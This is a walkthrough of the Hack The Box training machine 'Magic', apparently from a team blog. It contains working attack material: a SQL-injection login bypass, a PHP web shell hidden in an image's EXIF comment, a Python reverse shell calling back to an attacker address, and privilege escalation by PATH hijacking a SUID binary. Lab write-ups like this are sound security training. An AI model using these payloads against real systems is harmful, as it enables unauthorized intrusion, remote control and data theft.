# HTB Magic Walkthrough Aug 31, 2020 | nanobyte I began with some simple enumeration scans: ``` 123456789101112131415161718nmap -sV -sC -p- 10.10.10.185 [478/478]Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 20:08 CDTNmap scan report for 10.10.10.185 Host is up (0.043s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA) | 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA) |_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Magic Portfolio Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 41.57 seconds ``` ``` 12345678910111213141516171819gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://10.10.10.185 -t 30=============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.185 [+] Threads: 30 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/05/26 20:10:17 Starting gobuster =============================================================== /assets (Status: 301) /images (Status: 301) =============================================================== 2020/05/26 20:12:26 Finished =============================================================== ``` I was able to identify SQL Injection on a login page, at , using the following in the username and password fields: ``` 12Username: ' or 1=1 --Password: ' or 1=1 -- ``` I tried to upload a PHP reverse shell, but got an error back asking `What are you trying to do here!?` so obviously it is blocked. By changing .php to .jpg resulted in the same error, so moved on. I downloaded an image from the internet, named it index.jpeg and used exfiltool to make a malicious image file: ``` 1exiftool -Comment='"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>' index.jpeg ``` Once I uploaded, I used BURP to intercept the image file, and sent to repeater. Once in repeater, I changed the filename to index.php.jpeg and sent the POST forward: ![burp\_repeater](https://ubg-hacking.team/images/posts/magic_walkthrough/burp_repeater.png) Once the malicious image was uploaded, I went back to the home page that was full of images, and I found that images were uploaded to `/images/uploads`. With this, I went to my image at `10.10.10.186/images/uploads/index.php.jpeg` and could then run commands: ``` 1http://10.10.10.185/images/uploads/index.php.jpeg?cmd=ls ``` Then, I got to work on a reverse shell! There were many shells that would not connect back. Eventually, I found python3 in `/usr/bin` and used a python reverse shell using my web shell: ``` 12/usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.64",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'http://10.10.10.185/images/uploads/index.php.jpeg?cmd=ls ``` And I got a reverse shell back:![shell](https://ubg-hacking.team/images/posts/magic_walkthrough/shell.png) I then began enumerating the `/var/www/Magic directory`, working my way down. Eventually I came across a `bk.sql` file, that had hardcoded credentials:![bk-sql](https://ubg-hacking.team/images/posts/magic_walkthrough/bk-sql.png) It did not work for root, but there is another user on the system, `theseus`. I was able to log right in as that user:![theseus](https://ubg-hacking.team/images/posts/magic_walkthrough/theseus.png) And I owned user: ``` 12cat /home/theseus/user.txtxxxxxxxxxxxxxxxxxxxxff70c41c8b037eaab ``` While enumerating for root, I found that the `sysinfo` binary had SUID set: ``` 1234find / -perm -u=s -type f 2>/dev/null.../bin/sysinfo... ``` Looking on the internet, there are a lot of MagniComp vulnerabilities that appeared for this binary. Ultimately, this was a combination of two attacks to get root. First, was a PATH injection. I had to set a path, in this case `/tmp`, into the `$PATH` variable for a malicious binary to run:![path-injection](https://ubg-hacking.team/images/posts/magic_walkthrough/path-injection.png) And now that we have our path set, let’s make the malicious binary. When sysinfo runs, it calls lshw to look at the hardware on the system. Make a malicious lshw file: ``` 12echo "/bin/cat /root/root.txt" > lshwchmod 777 lshw ``` Then once sysinfo is run, you will have root! ``` 12cat /root/root.txtxxxxxxxxxxxxxxxxxx051a7763c65c29a26f4 ```